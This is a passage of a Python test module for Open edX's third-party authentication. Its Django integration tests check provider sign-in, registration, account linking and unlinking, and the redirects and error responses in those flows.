from django.test import utils as django_utils
from django.conf import settings as django_settings
from social_core import actions, exceptions
from social_django import utils as social_utils
from social_django import views as social_views
from lms.djangoapps.commerce.tests import TEST_API_URL
from openedx.core.djangoapps.site_configuration.tests.factories import SiteFactory
from student import models as student_models
from student import views as student_views
from student.tests.factories import UserFactory
from student_account.views import account_settings_context
from third_party_auth import middleware, pipeline
from third_party_auth.tests import testutil
class IntegrationTestMixin(object):
"""
Mixin base class for third_party_auth integration tests.
This class is newer and simpler than the 'IntegrationTest' alternative below, but it is
currently less comprehensive. Some providers are tested with this, others with
IntegrationTest.
"""
# Provider information:
PROVIDER_NAME = "override"
PROVIDER_BACKEND = "override"
PROVIDER_ID = "override"
# Information about the user expected from the provider:
USER_EMAIL = "override"
USER_NAME = "override"
USER_USERNAME = "override"
def setUp(self):
super(IntegrationTestMixin, self).setUp()
self.login_page_url = reverse('signin_user')
self.register_page_url = reverse('register_user')
patcher = testutil.patch_mako_templates()
patcher.start()
self.addCleanup(patcher.stop)
# Override this method in a subclass and enable at least one provider.
def test_register(self, **extra_defaults):
# The user goes to the register page, and sees a button to register with the provider:
provider_register_url = self._check_register_page()
# The user clicks on the Dummy button:
try_login_response = self.client.get(provider_register_url)
# The user should be redirected to the provider's login page:
self.assertEqual(try_login_response.status_code, 302)
provider_response = self.do_provider_login(try_login_response['Location'])
# We should be redirected to the register screen since this account is not linked to an edX account:
self.assertEqual(provider_response.status_code, 302)
self.assertEqual(provider_response['Location'], self.url_prefix + self.register_page_url)
register_response = self.client.get(self.register_page_url)
tpa_context = register_response.context["data"]["third_party_auth"]
self.assertEqual(tpa_context["errorMessage"], None)
# Check that the "You've successfully signed into [PROVIDER_NAME]" message is shown.
self.assertEqual(tpa_context["currentProvider"], self.PROVIDER_NAME)
# Check that the data (e.g. email) from the provider is displayed in the form:
form_data = register_response.context['data']['registration_form_desc']
form_fields = {field['name']: field for field in form_data['fields']}
self.assertEqual(form_fields['email']['defaultValue'], self.USER_EMAIL)
self.assertEqual(form_fields['name']['defaultValue'], self.USER_NAME)
self.assertEqual(form_fields['username']['defaultValue'], self.USER_USERNAME)
for field_name, value in extra_defaults.items():
self.assertEqual(form_fields[field_name]['defaultValue'], value)
registration_values = {
'email': '[email protected]',
'name': 'My Customized Name',
'username': 'new_username',
'honor_code': True,
}
# Now complete the form:
ajax_register_response = self.client.post(
reverse('user_api_registration'),
registration_values
)
self.assertEqual(ajax_register_response.status_code, 200)
# Then the AJAX will finish the third party auth:
continue_response = self.client.get(tpa_context["finishAuthUrl"])
# And we should be redirected to the dashboard:
self.assertEqual(continue_response.status_code, 302)
self.assertEqual(continue_response['Location'], self.url_prefix + reverse('dashboard'))
# Now check that we can login again, whether or not we have yet verified the account:
self.client.logout()
self._test_return_login(user_is_activated=False)
self.client.logout()
self.verify_user_email('[email protected]')
self._test_return_login(user_is_activated=True)
def test_login(self):
self.user = UserFactory.create() # pylint: disable=attribute-defined-outside-init
# The user goes to the login page, and sees a button to login with this provider:
provider_login_url = self._check_login_page()
# The user clicks on the provider's button:
try_login_response = self.client.get(provider_login_url)
# The user should be redirected to the provider's login page:
self.assertEqual(try_login_response.status_code, 302)
complete_response = self.do_provider_login(try_login_response['Location'])
# We should be redirected to the login screen since this account is not linked to an edX account:
self.assertEqual(complete_response.status_code, 302)
self.assertEqual(complete_response['Location'], self.url_prefix + self.login_page_url)
login_response = self.client.get(self.login_page_url)
tpa_context = login_response.context["data"]["third_party_auth"]
self.assertEqual(tpa_context["errorMessage"], None)
# Check that the "You've successfully signed into [PROVIDER_NAME]" message is shown.
self.assertEqual(tpa_context["currentProvider"], self.PROVIDER_NAME)
# Now the user enters their username and password.
# The AJAX on the page will log them in:
ajax_login_response = self.client.post(
reverse('user_api_login_session'),
{'email': self.user.email, 'password': 'test'}
)
self.assertEqual(ajax_login_response.status_code, 200)
# Then the AJAX will finish the third party auth:
continue_response = self.client.get(tpa_context["finishAuthUrl"])
# And we should be redirected to the dashboard:
self.assertEqual(continue_response.status_code, 302)
self.assertEqual(continue_response['Location'], self.url_prefix + reverse('dashboard'))
# Now check that we can login again:
self.client.logout()
self._test_return_login()
def do_provider_login(self, provider_redirect_url):
"""
mock logging in to the provider
Should end with loading self.complete_url, which should be returned
"""
raise NotImplementedError
def _test_return_login(self, user_is_activated=True, previous_session_timed_out=False):
""" Test logging in to an account that is already linked. """
# Make sure we're not logged in:
dashboard_response = self.client.get(reverse('dashboard'))
self.assertEqual(dashboard_response.status_code, 302)
# The user goes to the login page, and sees a button to login with this provider:
provider_login_url = self._check_login_page()
# The user clicks on the provider's login button:
try_login_response = self.client.get(provider_login_url)
# The user should be redirected to the provider:
self.assertEqual(try_login_response.status_code, 302)
login_response = self.do_provider_login(try_login_response['Location'])
# If the previous session was manually logged out, there will be one weird redirect
# required to set the login cookie (it sticks around if the main session times out):
if not previous_session_timed_out:
self.assertEqual(login_response.status_code, 302)
self.assertEqual(login_response['Location'], self.url_prefix + self.complete_url)
# And then we should be redirected to the dashboard:
login_response = self.client.get(login_response['Location'])
self.assertEqual(login_response.status_code, 302)
if user_is_activated:
url_expected = reverse('dashboard')
else:
url_expected = reverse('third_party_inactive_redirect') + '?next=' + reverse('dashboard')
self.assertEqual(login_response['Location'], self.url_prefix + url_expected)
# Now we are logged in:
dashboard_response = self.client.get(reverse('dashboard'))
self.assertEqual(dashboard_response.status_code, 200)
def _check_login_page(self):
"""
Load the login form and check that it contains a button for the provider.
Return the URL for logging into that provider.
"""
return self._check_login_or_register_page(self.login_page_url, "loginUrl")
def _check_register_page(self):
"""
Load the registration form and check that it contains a button for the provider.
Return the URL for registering with that provider.
"""
return self._check_login_or_register_page(self.register_page_url, "registerUrl")
def _check_login_or_register_page(self, url, url_to_return):
""" Shared logic for _check_login_page() and _check_register_page() """
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertIn(self.PROVIDER_NAME, response.content)
context_data = response.context['data']['third_party_auth']
provider_urls = {provider['id']: provider[url_to_return] for provider in context_data['providers']}
self.assertIn(self.PROVIDER_ID, provider_urls)
return provider_urls[self.PROVIDER_ID]
@property
def complete_url(self):
""" Get the auth completion URL for this provider """
return reverse('social:complete', kwargs={'backend': self.PROVIDER_BACKEND})
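# Added illustrative sketch (comment only, not part of the original test suite):
# a concrete provider test is expected to mix IntegrationTestMixin into a
# TestCase, override the provider constants and expected user data, enable the
# provider under test in setUp(), and implement do_provider_login(). The class
# name, values, and setup step below are hypothetical placeholders:
#
#     class DummyProviderIntegrationTest(IntegrationTestMixin, testutil.TestCase):
#         PROVIDER_NAME = "Dummy"
#         PROVIDER_BACKEND = "dummy"
#         PROVIDER_ID = "oa2-dummy"
#         USER_EMAIL = "[email protected]"
#         USER_NAME = "Dummy User"
#         USER_USERNAME = "dummy"
#
#         def setUp(self):
#             super(DummyProviderIntegrationTest, self).setUp()
#             # enable/configure the "dummy" provider here (helper omitted)
#
#         def do_provider_login(self, provider_redirect_url):
#             # simulate the provider's login flow, then resume the pipeline
#             return self.client.get(self.complete_url)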
@unittest.skipUnless(
testutil.AUTH_FEATURES_KEY in django_settings.FEATURES, testutil.AUTH_FEATURES_KEY + ' not in settings.FEATURES')
@django_utils.override_settings() # For settings reversion on a method-by-method basis.
class IntegrationTest(testutil.TestCase, test.TestCase):
"""Abstract base class for provider integration tests."""
# Override setUp and set this:
provider = None
# Methods you must override in your children.
def get_response_data(self):
"""Gets a dict of response data of the form given by the provider.
To determine what the provider returns, drop into a debugger in your
provider's do_auth implementation. Providers may merge different kinds
of data (for example, data about the user and data about the user's
credentials).
"""
raise NotImplementedError
def get_username(self):
"""Gets username based on response data from a provider.
Each provider has different logic for username generation. Sadly,
this is not extracted into its own method in python-social-auth, so we
must provide a getter ourselves.
Note that this is the *initial* value the framework will attempt to use.
If it collides, the pipeline will generate a new username. We extract
it here so we can force collisions in a polymorphic way.
"""
raise NotImplementedError
# Asserts you can optionally override and make more specific.
def assert_redirect_to_provider_looks_correct(self, response):
"""Asserts the redirect to the provider's site looks correct.
When we hit /auth/login/<provider>, we should be redirected to the
provider's site. Here we check that we're redirected, but we don't know
enough about the provider to check what we're redirected to. Child test
implementations may optionally strengthen this assertion with, for
example, more details about the format of the Location header.
"""
self.assertEqual(302, response.status_code)
self.assertTrue(response.has_header('Location'))
def assert_register_response_in_pipeline_looks_correct(self, response, pipeline_kwargs, required_fields):
"""Performs spot checks of the rendered register.html page.
When we display the new account registration form after the user signs
in with a third party, we prepopulate the form with values sent back
from the provider. The exact set of values varies on a provider-by-
provider basis and is generated by
provider.BaseProvider.get_register_form_data. We provide some stock
assertions based on the provider's implementation; if you want more
assertions in your test, override this method.
"""
self.assertEqual(200, response.status_code)
# Check that the correct provider was selected.
self.assertIn('successfully signed in with <strong>%s</strong>' % self.provider.name, response.content)
# Expect that each truthy value we've prepopulated the register form
# with is actually present.
form_field_data = self.provider.get_register_form_data(pipeline_kwargs)
for prepopulated_form_data in form_field_data:
if prepopulated_form_data in required_fields:
self.assertIn(form_field_data[prepopulated_form_data], response.content.decode('utf-8'))
# Implementation details and actual tests past this point -- no more
# configuration needed.
def setUp(self):
super(IntegrationTest, self).setUp()
self.request_factory = test.RequestFactory()
@property
def backend_name(self):
""" Shortcut for the backend name """
return self.provider.backend_name
# pylint: disable=invalid-name
def assert_account_settings_context_looks_correct(self, context, duplicate=False, linked=None):
"""Asserts the user's account settings page context is in the expected state.
If duplicate is True, we expect context['duplicate_provider'] to contain
the duplicate provider backend name. If linked is passed, we conditionally
check that the provider is included in context['auth']['providers'] and
its connected state is correct.
"""
if duplicate:
self.assertEqual(context['duplicate_provider'], self.provider.backend_name)
else:
self.assertIsNone(context['duplicate_provider'])
if linked is not None:
expected_provider = [
provider for provider in context['auth']['providers'] if provider['name'] == self.provider.name
][0]
self.assertIsNotNone(expected_provider)
self.assertEqual(expected_provider['connected'], linked)
def assert_exception_redirect_looks_correct(self, expected_uri, auth_entry=None):
"""Tests middleware conditional redirection.
middleware.ExceptionMiddleware makes sure the user ends up in the right
place when they cancel authentication via the provider's UX.
"""
exception_middleware = middleware.ExceptionMiddleware()
request, _ = self.get_request_and_strategy(auth_entry=auth_entry)
response = exception_middleware.process_exception(
request, exceptions.AuthCanceled(request.backend))
location = response.get('Location')
self.assertEqual(302, response.status_code)
self.assertIn('canceled', location)
self.assertIn(self.backend_name, location)
self.assertTrue(location.startswith(expected_uri + '?'))
def assert_first_party_auth_trumps_third_party_auth(self, email=None, password=None, success=None):
"""Asserts first party auth was used in place of third party auth.
Args:
email: string. The user's email. If not None, will be set on POST.
password: string. The user's password. If not None, will be set on
POST.
success: None or bool. Whether we expect auth to be successful. Set
to None to indicate we expect the request to be invalid (meaning
one of username or password will be missing).
"""
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
self.create_user_models_for_existing_account(
strategy, email, password, self.get_username(), skip_social_auth=True)
strategy.request.POST = dict(strategy.request.POST)
if email:
strategy.request.POST['email'] = email
if password:
strategy.request.POST['password'] = 'bad_' + password if success is False else password
self.assert_pipeline_running(strategy.request)
payload = json.loads(student_views.login_user(strategy.request).content)
if success is None:
# Request malformed -- just one of email/password given.
self.assertFalse(payload.get('success'))
self.assertIn('There was an error receiving your login information', payload.get('value'))
elif success:
# Request well-formed and credentials good.
self.assertTrue(payload.get('success'))
else:
# Request well-formed but credentials bad.
self.assertFalse(payload.get('success'))
self.assertIn('incorrect', payload.get('value'))
def assert_json_failure_response_is_inactive_account(self, response):
"""Asserts failure on /login for inactive account looks right."""
self.assertEqual(200, response.status_code) # Yes, it's a 200 even though it's a failure.
payload = json.loads(response.content)
self.assertFalse(payload.get('success'))
self.assertIn('In order to sign in, you need to activate your account.', payload.get('value'))
def assert_json_failure_response_is_missing_social_auth(self, response):
"""Asserts failure on /login for missing social auth looks right."""
self.assertEqual(403, response.status_code)
self.assertIn(
"successfully logged into your %s account, but this account isn't linked" % self.provider.name,
response.content
)
def assert_json_failure_response_is_username_collision(self, response):
"""Asserts the json response indicates a username collision."""
self.assertEqual(400, response.status_code)
payload = json.loads(response.content)
self.assertFalse(payload.get('success'))
self.assertIn('belongs to an existing account', payload.get('value'))
def assert_json_success_response_looks_correct(self, response):
"""Asserts the json response indicates success and redirection."""
self.assertEqual(200, response.status_code)
payload = json.loads(response.content)
self.assertTrue(payload.get('success'))
self.assertEqual(pipeline.get_complete_url(self.provider.backend_name), payload.get('redirect_url'))
def assert_login_response_before_pipeline_looks_correct(self, response):
"""Asserts a GET of /login not in the pipeline looks correct."""
self.assertEqual(200, response.status_code)
# The combined login/registration page dynamically generates the login button,
# but we can still check that the provider name is passed in the data attribute
# for the container element.
self.assertIn(self.provider.name, response.content)
def assert_login_response_in_pipeline_looks_correct(self, response):
"""Asserts a GET of /login in the pipeline looks correct."""
self.assertEqual(200, response.status_code)
def assert_password_overridden_by_pipeline(self, username, password):
"""Verifies that the given password is not correct.
The pipeline overrides POST['password'], if any, with random data.
"""
self.assertIsNone(auth.authenticate(password=password, username=username))
def assert_pipeline_running(self, request):
"""Makes sure the given request is running an auth pipeline."""
self.assertTrue(pipeline.running(request))
def assert_redirect_to_dashboard_looks_correct(self, response):
"""Asserts a response would redirect to /dashboard."""
self.assertEqual(302, response.status_code)
# NOTE: Ideally we should use assertRedirects(), however it errors out due to the hostname, testserver,
# not being properly set. This may be an issue with the call made by PSA, but we are not certain.
# pylint: disable=protected-access
self.assertTrue(response.get('Location').endswith(django_settings.SOCIAL_AUTH_LOGIN_REDIRECT_URL))
def assert_redirect_to_login_looks_correct(self, response):
"""Asserts a response would redirect to /login."""
self.assertEqual(302, response.status_code)
self.assertEqual('/login', response.get('Location'))
def assert_redirect_to_register_looks_correct(self, response):
"""Asserts a response would redirect to /register."""
self.assertEqual(302, response.status_code)
self.assertEqual('/register', response.get('Location'))
def assert_register_response_before_pipeline_looks_correct(self, response):
"""Asserts a GET of /register not in the pipeline looks correct."""
self.assertEqual(200, response.status_code)
# The combined login/registration page dynamically generates the register button,
# but we can still check that the provider name is passed in the data attribute
# for the container element.
self.assertIn(self.provider.name, response.content)
def assert_social_auth_does_not_exist_for_user(self, user, strategy):
"""Asserts a user does not have an auth with the expected provider."""
social_auths = strategy.storage.user.get_social_auth_for_user(
user, provider=self.provider.backend_name)
self.assertEqual(0, len(social_auths))
def assert_social_auth_exists_for_user(self, user, strategy):
"""Asserts a user has a social auth with the expected provider."""
social_auths = strategy.storage.user.get_social_auth_for_user(
user, provider=self.provider.backend_name)
self.assertEqual(1, len(social_auths))
self.assertEqual(self.backend_name, social_auths[0].provider)
def create_user_models_for_existing_account(self, strategy, email, password, username, skip_social_auth=False):
"""Creates user, profile, registration, and (usually) social auth.
This synthesizes what happens during /register.
See student.views.register and student.views._do_create_account.
"""
response_data = self.get_response_data()
uid = strategy.request.backend.get_user_id(response_data, response_data)
user = social_utils.Storage.user.create_user(email=email, password=password, username=username)
profile = student_models.UserProfile(user=user)
profile.save()
registration = student_models.Registration()
registration.register(user)
registration.save()
if not skip_social_auth:
social_utils.Storage.user.create_social_auth(user, uid, self.provider.backend_name)
return user
def fake_auth_complete(self, strategy):
"""Fake implementation of social_core.backends.BaseAuth.auth_complete.
Unlike what the docs say, it does not need to return a user instance.
Sometimes (like when directing users to the /register form) it instead
returns a response that 302s to /register.
"""
args = ()
kwargs = {
'request': strategy.request,
'backend': strategy.request.backend,
'user': None,
'response': self.get_response_data(),
}
return strategy.authenticate(*args, **kwargs)
def get_registration_post_vars(self, overrides=None):
"""POST vars generated by the registration form."""
defaults = {
'username': 'username',
'name': 'First Last',
'gender': '',
'year_of_birth': '',
'level_of_education': '',
'goals': '',
'honor_code': 'true',
'terms_of_service': 'true',
'password': 'password',
'mailing_address': '',
'email': '[email protected]',
}
if overrides:
defaults.update(overrides)
return defaults
def get_request_and_strategy(self, auth_entry=None, redirect_uri=None):
"""Gets a fully-configured request and strategy.
These two objects contain circular references, so we create them
together. The references themselves are a mixture of normal __init__
stuff and monkey-patching done by python-social-auth. See, for example,
social_django.utils.strategy().
"""
request = self.request_factory.get(
pipeline.get_complete_url(self.backend_name) +
'?redirect_state=redirect_state_value&code=code_value&state=state_value')
request.site = SiteFactory.create()
request.user = auth_models.AnonymousUser()
request.session = cache.SessionStore()
request.session[self.backend_name + '_state'] = 'state_value'
if auth_entry:
request.session[pipeline.AUTH_ENTRY_KEY] = auth_entry
strategy = social_utils.load_strategy(request=request)
request.social_strategy = strategy
request.backend = social_utils.load_backend(strategy, self.backend_name, redirect_uri)
return request, strategy
@contextmanager
def _patch_edxmako_current_request(self, request):
"""Make ``request`` be the current request for edxmako template rendering."""
with mock.patch('edxmako.request_context.get_current_request', return_value=request):
yield
def get_user_by_email(self, strategy, email):
"""Gets a user by email, using the given strategy."""
return strategy.storage.user.user_model().objects.get(email=email)
def assert_logged_in_cookie_redirect(self, response):
"""Verify that the user was redirected in order to set the logged in cookie. """
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["Location"],
pipeline.get_complete_url(self.provider.backend_name)
)
self.assertEqual(response.cookies[django_settings.EDXMKTG_LOGGED_IN_COOKIE_NAME].value, 'true')
self.assertIn(django_settings.EDXMKTG_USER_INFO_COOKIE_NAME, response.cookies)
def set_logged_in_cookies(self, request):
"""Simulate setting the marketing site cookie on the request. """
request.COOKIES[django_settings.EDXMKTG_LOGGED_IN_COOKIE_NAME] = 'true'
request.COOKIES[django_settings.EDXMKTG_USER_INFO_COOKIE_NAME] = json.dumps({
'version': django_settings.EDXMKTG_USER_INFO_COOKIE_VERSION,
})
# Actual tests, executed once per child.
def test_canceling_authentication_redirects_to_login_when_auth_entry_login(self):
self.assert_exception_redirect_looks_correct('/login', auth_entry=pipeline.AUTH_ENTRY_LOGIN)
def test_canceling_authentication_redirects_to_register_when_auth_entry_register(self):
self.assert_exception_redirect_looks_correct('/register', auth_entry=pipeline.AUTH_ENTRY_REGISTER)
def test_canceling_authentication_redirects_to_account_settings_when_auth_entry_account_settings(self):
self.assert_exception_redirect_looks_correct(
'/account/settings', auth_entry=pipeline.AUTH_ENTRY_ACCOUNT_SETTINGS
)
def test_canceling_authentication_redirects_to_root_when_auth_entry_not_set(self):
self.assert_exception_redirect_looks_correct('/')
def test_full_pipeline_succeeds_for_linking_account(self):
        # First, create the request and strategy that store pipeline state,
# configure the backend, and mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
pipeline.analytics.track = mock.MagicMock()
request.user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username(), skip_social_auth=True)
# Instrument the pipeline to get to the dashboard with the full
# expected state.
self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN))
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
student_views.signin_user(strategy.request)
student_views.login_user(strategy.request)
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
# First we expect that we're in the unlinked state, and that there
# really is no association in the backend.
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=False)
self.assert_social_auth_does_not_exist_for_user(request.user, strategy)
# We should be redirected back to the complete page, setting
# the "logged in" cookie for the marketing site.
self.assert_logged_in_cookie_redirect(actions.do_complete(
request.backend, social_views._do_login, request.user, None, # pylint: disable=protected-access
redirect_field_name=auth.REDIRECT_FIELD_NAME
))
# Set the cookie and try again
self.set_logged_in_cookies(request)
# Fire off the auth pipeline to link.
self.assert_redirect_to_dashboard_looks_correct( # pylint: disable=protected-access
actions.do_complete(
request.backend,
social_views._do_login,
request.user,
None,
redirect_field_name=auth.REDIRECT_FIELD_NAME
)
)
# Now we expect to be in the linked state, with a backend entry.
self.assert_social_auth_exists_for_user(request.user, strategy)
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=True)
def test_full_pipeline_succeeds_for_unlinking_account(self):
        # First, create the request and strategy that store pipeline state,
# configure the backend, and mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username())
self.assert_social_auth_exists_for_user(user, strategy)
# We're already logged in, so simulate that the cookie is set correctly
self.set_logged_in_cookies(request)
# Instrument the pipeline to get to the dashboard with the full
# expected state.
self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN))
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
with self._patch_edxmako_current_request(strategy.request):
student_views.signin_user(strategy.request)
student_views.login_user(strategy.request)
actions.do_complete(request.backend, social_views._do_login, user=user) # pylint: disable=protected-access
# First we expect that we're in the linked state, with a backend entry.
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=True)
self.assert_social_auth_exists_for_user(request.user, strategy)
# Fire off the disconnect pipeline to unlink.
self.assert_redirect_to_dashboard_looks_correct(
actions.do_disconnect(
request.backend,
request.user,
None,
redirect_field_name=auth.REDIRECT_FIELD_NAME
)
)
# Now we expect to be in the unlinked state, with no backend entry.
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=False)
self.assert_social_auth_does_not_exist_for_user(user, strategy)
def test_linking_already_associated_account_raises_auth_already_associated(self):
# This is of a piece with
# test_already_associated_exception_populates_dashboard_with_error. It
# verifies the exception gets raised when we expect; the latter test
# covers exception handling.
email = '[email protected]'
password = 'password'
username = self.get_username()
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
backend = strategy.request.backend
backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
linked_user = self.create_user_models_for_existing_account(strategy, email, password, username)
unlinked_user = social_utils.Storage.user.create_user(
email='other_' + email, password=password, username='other_' + username)
self.assert_social_auth_exists_for_user(linked_user, strategy)
self.assert_social_auth_does_not_exist_for_user(unlinked_user, strategy)
with self.assertRaises(exceptions.AuthAlreadyAssociated):
# pylint: disable=protected-access
actions.do_complete(backend, social_views._do_login, user=unlinked_user)
def test_already_associated_exception_populates_dashboard_with_error(self):
# Instrument the pipeline with an exception. We test that the
# exception is raised correctly separately, so it's ok that we're
# raising it artificially here. This makes the linked=True artificial
# in the final assert because in practice the account would be
# unlinked, but getting that behavior is cumbersome here and already
# covered in other tests. Using linked=True does, however, let us test
# that the duplicate error has no effect on the state of the controls.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username())
self.assert_social_auth_exists_for_user(user, strategy)
self.client.get('/login')
self.client.get(pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN))
actions.do_complete(request.backend, social_views._do_login) # pylint: disable=protected-access
with self._patch_edxmako_current_request(strategy.request):
student_views.signin_user(strategy.request)
student_views.login_user(strategy.request)
actions.do_complete(request.backend, social_views._do_login, user=user) # pylint: disable=protected-access
# Monkey-patch storage for messaging; pylint: disable=protected-access
request._messages = fallback.FallbackStorage(request)
middleware.ExceptionMiddleware().process_exception(
request,
exceptions.AuthAlreadyAssociated(self.provider.backend_name, 'account is already in use.'))
self.assert_account_settings_context_looks_correct(
account_settings_context(request), duplicate=True, linked=True)
def test_full_pipeline_succeeds_for_signing_in_to_existing_active_account(self):
        # First, create the request and strategy that store pipeline state,
# configure the backend, and mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
pipeline.analytics.track = mock.MagicMock()
user = self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username())
self.assert_social_auth_exists_for_user(user, strategy)
self.assertTrue(user.is_active)
# Begin! Ensure that the login form contains expected controls before
# the user starts the pipeline.
self.assert_login_response_before_pipeline_looks_correct(self.client.get('/login'))
# The pipeline starts by a user GETting /auth/login/<provider>.
# Synthesize that request and check that it redirects to the correct
# provider page.
self.assert_redirect_to_provider_looks_correct(self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN)))
# Next, the provider makes a request against /auth/complete/<provider>
# to resume the pipeline.
# pylint: disable=protected-access
self.assert_redirect_to_login_looks_correct(actions.do_complete(request.backend, social_views._do_login))
# At this point we know the pipeline has resumed correctly. Next we
# fire off the view that displays the login form and posts it via JS.
with self._patch_edxmako_current_request(strategy.request):
self.assert_login_response_in_pipeline_looks_correct(student_views.signin_user(strategy.request))
# Next, we invoke the view that handles the POST, and expect it
# redirects to /auth/complete. In the browser ajax handlers will
# redirect the user to the dashboard; we invoke it manually here.
self.assert_json_success_response_looks_correct(student_views.login_user(strategy.request))
# We should be redirected back to the complete page, setting
# the "logged in" cookie for the marketing site.
self.assert_logged_in_cookie_redirect(actions.do_complete(
request.backend, social_views._do_login, request.user, None, # pylint: disable=protected-access
redirect_field_name=auth.REDIRECT_FIELD_NAME
))
# Set the cookie and try again
self.set_logged_in_cookies(request)
self.assert_redirect_to_dashboard_looks_correct(
actions.do_complete(request.backend, social_views._do_login, user=user))
self.assert_account_settings_context_looks_correct(account_settings_context(request))
def test_signin_fails_if_account_not_active(self):
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
user = self.create_user_models_for_existing_account(strategy, '[email protected]', 'password', self.get_username())
user.is_active = False
user.save()
with self._patch_edxmako_current_request(strategy.request):
self.assert_json_failure_response_is_inactive_account(student_views.login_user(strategy.request))
def test_signin_fails_if_no_account_associated(self):
_, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_LOGIN, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
self.create_user_models_for_existing_account(
strategy, '[email protected]', 'password', self.get_username(), skip_social_auth=True)
self.assert_json_failure_response_is_missing_social_auth(student_views.login_user(strategy.request))
def test_first_party_auth_trumps_third_party_auth_but_is_invalid_when_only_email_in_request(self):
self.assert_first_party_auth_trumps_third_party_auth(email='[email protected]')
def test_first_party_auth_trumps_third_party_auth_but_is_invalid_when_only_password_in_request(self):
self.assert_first_party_auth_trumps_third_party_auth(password='password')
def test_first_party_auth_trumps_third_party_auth_and_fails_when_credentials_bad(self):
self.assert_first_party_auth_trumps_third_party_auth(
email='[email protected]', password='password', success=False)
def test_first_party_auth_trumps_third_party_auth_and_succeeds_when_credentials_good(self):
self.assert_first_party_auth_trumps_third_party_auth(
email='[email protected]', password='password', success=True)
def test_full_pipeline_succeeds_registering_new_account(self):
        # First, create the request and strategy that store pipeline state.
# Mock out wire traffic.
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_REGISTER, redirect_uri='social:complete')
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# Begin! Grab the registration page and check the login control on it.
self.assert_register_response_before_pipeline_looks_correct(self.client.get('/register'))
# The pipeline starts by a user GETting /auth/login/<provider>.
# Synthesize that request and check that it redirects to the correct
# provider page.
self.assert_redirect_to_provider_looks_correct(self.client.get(
pipeline.get_login_url(self.provider.provider_id, pipeline.AUTH_ENTRY_LOGIN)))
# Next, the provider makes a request against /auth/complete/<provider>.
# pylint: disable=protected-access
self.assert_redirect_to_register_looks_correct(actions.do_complete(request.backend, social_views._do_login))
# At this point we know the pipeline has resumed correctly. Next we
# fire off the view that displays the registration form.
with self._patch_edxmako_current_request(request):
self.assert_register_response_in_pipeline_looks_correct(
student_views.register_user(strategy.request),
pipeline.get(request)['kwargs'],
['name', 'username', 'email']
)
# Next, we invoke the view that handles the POST. Not all providers
# supply email. Manually add it as the user would have to; this
# also serves as a test of overriding provider values. Always provide a
# password for us to check that we override it properly.
overridden_password = strategy.request.POST.get('password')
email = '[email protected]'
if not strategy.request.POST.get('email'):
strategy.request.POST = self.get_registration_post_vars({'email': email})
# The user must not exist yet...
with self.assertRaises(auth_models.User.DoesNotExist):
self.get_user_by_email(strategy, email)
# ...but when we invoke create_account the existing edX view will make
# it, but not social auths. The pipeline creates those later.
with self._patch_edxmako_current_request(strategy.request):
self.assert_json_success_response_looks_correct(student_views.create_account(strategy.request))
# We've overridden the user's password, so authenticate() with the old
# value won't work:
created_user = self.get_user_by_email(strategy, email)
self.assert_password_overridden_by_pipeline(overridden_password, created_user.username)
# At this point the user object exists, but there is no associated
# social auth.
self.assert_social_auth_does_not_exist_for_user(created_user, strategy)
# We should be redirected back to the complete page, setting
# the "logged in" cookie for the marketing site.
self.assert_logged_in_cookie_redirect(actions.do_complete(
request.backend, social_views._do_login, request.user, None, # pylint: disable=protected-access
redirect_field_name=auth.REDIRECT_FIELD_NAME
))
# Set the cookie and try again
self.set_logged_in_cookies(request)
self.assert_redirect_to_dashboard_looks_correct(
actions.do_complete(strategy.request.backend, social_views._do_login, user=created_user))
# Now the user has been redirected to the dashboard. Their third party account should now be linked.
self.assert_social_auth_exists_for_user(created_user, strategy)
self.assert_account_settings_context_looks_correct(account_settings_context(request), linked=True)
def test_new_account_registration_assigns_distinct_username_on_collision(self):
original_username = self.get_username()
